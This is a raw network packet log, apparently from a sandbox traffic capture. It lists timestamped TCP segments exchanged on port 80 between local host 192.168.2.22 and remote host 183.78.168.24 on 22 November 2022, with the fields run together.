                                                                                Nov 22, 2022 05:10:29.804488897 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.804511070 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.804663897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.804735899 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.804775953 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.804786921 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.804903030 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.804979086 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805022955 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.805072069 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805171013 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805299997 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805337906 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805350065 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.805418015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805459976 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.805485010 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805581093 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805663109 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805707932 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.805820942 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805854082 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805936098 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.805977106 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.806047916 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.806180000 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.806225061 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.806233883 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.806299925 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.806459904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.806500912 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.806509018 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.806618929 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.806658983 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.806700945 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.806773901 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.806857109 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.806895971 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.806982040 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.807058096 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.807106972 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.807179928 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.807262897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.807310104 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.807333946 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.807416916 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.807497978 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.807539940 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.807616949 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.807698011 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.807775021 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.807816029 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.807861090 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.807976961 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.808227062 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.808290005 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.808339119 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.958569050 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.958642960 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.958684921 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.958713055 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.958760977 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.959261894 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.959290981 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.959348917 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.959405899 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.959420919 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.959470034 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.959584951 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.959640026 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.959657907 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.959705114 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.959795952 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.959851027 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.959903002 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.959995985 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.960131884 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.960180044 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.960206985 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.960299015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.960450888 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.960500002 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.960526943 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.960568905 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.960659981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.960711002 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.960771084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.960875034 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.960920095 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.960980892 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.961055040 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.961112022 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.961154938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.961199999 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.961267948 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.961364031 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.961414099 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.961472988 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.961539984 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.961725950 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.961824894 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.961877108 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.961905003 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.961961031 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962004900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962049007 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.962075949 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962167025 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962254047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962318897 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.962388039 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962431908 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962552071 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962598085 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.962651968 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962759972 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962814093 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962858915 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.962924004 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.962975979 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.963073015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.963130951 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.963144064 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.963237047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.963300943 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.963368893 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.963419914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.963512897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.963558912 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.963622093 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.963666916 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.963690996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.963782072 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.963829041 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.963896990 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.963988066 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.964279890 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.964344978 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.964401960 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.113061905 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.113127947 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.113188982 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.113217115 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.113269091 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.113298893 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.113363028 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.113406897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.113461971 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.113544941 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.113640070 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.113815069 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.113909960 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.113970041 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114017010 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114067078 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.114089012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114130020 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114221096 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114269018 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.114346981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114392996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114439011 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114485025 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.114536047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114634037 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114680052 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.114698887 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114799976 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114844084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.114926100 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.115153074 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.115214109 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.115264893 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.115294933 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.115428925 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.115478039 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.115524054 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.115607977 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.115709066 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.115747929 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.115794897 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.116055012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116108894 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116164923 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116204977 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116230011 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.116278887 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116322041 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116367102 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.116441011 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116545916 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116592884 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116641045 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116655111 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.116707087 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116837978 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116875887 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.116904974 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.116950035 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.117022991 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.117070913 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.117121935 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.117186069 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.117276907 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.117378950 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.117588043 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.117630005 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.117688894 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.117736101 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.117754936 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.120381117 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.120439053 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.120488882 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.120513916 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.120558977 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.120599985 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.120620966 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.120661020 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.120699883 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.120717049 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.120754957 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.120795012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.120852947 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.267714977 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.267792940 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.267842054 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.267906904 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.267965078 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268013000 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268052101 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268102884 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268120050 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.268181086 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268225908 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268273115 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.268409967 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268465996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268524885 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268542051 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.268609047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268774033 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268826008 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.268908978 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.268963099 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269002914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269045115 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.269082069 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269130945 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.269157887 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269215107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269264936 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269279003 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.269448996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269504070 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269547939 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269612074 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.269670963 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269711018 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.269731998 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269826889 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269912004 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.269961119 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.270374060 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.270437956 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.270452023 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.270493031 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.270585060 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.270633936 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.270700932 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.270755053 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.270803928 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.270823002 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.270997047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.271056890 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.271131039 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.271217108 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.271282911 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.271346092 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.271373034 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.271491051 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.271631002 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.271707058 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.271748066 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.271800995 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.271819115 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.271868944 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.271908045 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.271954060 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.274832964 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.274936914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.274992943 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.275019884 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.275070906 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.275173903 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.275219917 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.275249004 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.275281906 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.275321007 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.275418997 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.275469065 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.275547028 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.275593996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.275681973 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.275710106 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.275815010 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.275871038 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.275887966 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.275934935 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.276037931 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.276088953 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.276128054 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.276350975 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.424706936 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.424767971 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.424807072 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.424845934 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.424873114 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.424921989 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.425039053 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.425105095 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.425136089 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.425175905 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.425255060 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.425303936 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.425367117 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.425446033 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.425501108 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.425589085 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.425683975 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.425741911 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.425806046 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:30.425920963 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:30.426002026 CET8049180183.78.168.24192.168.2.22
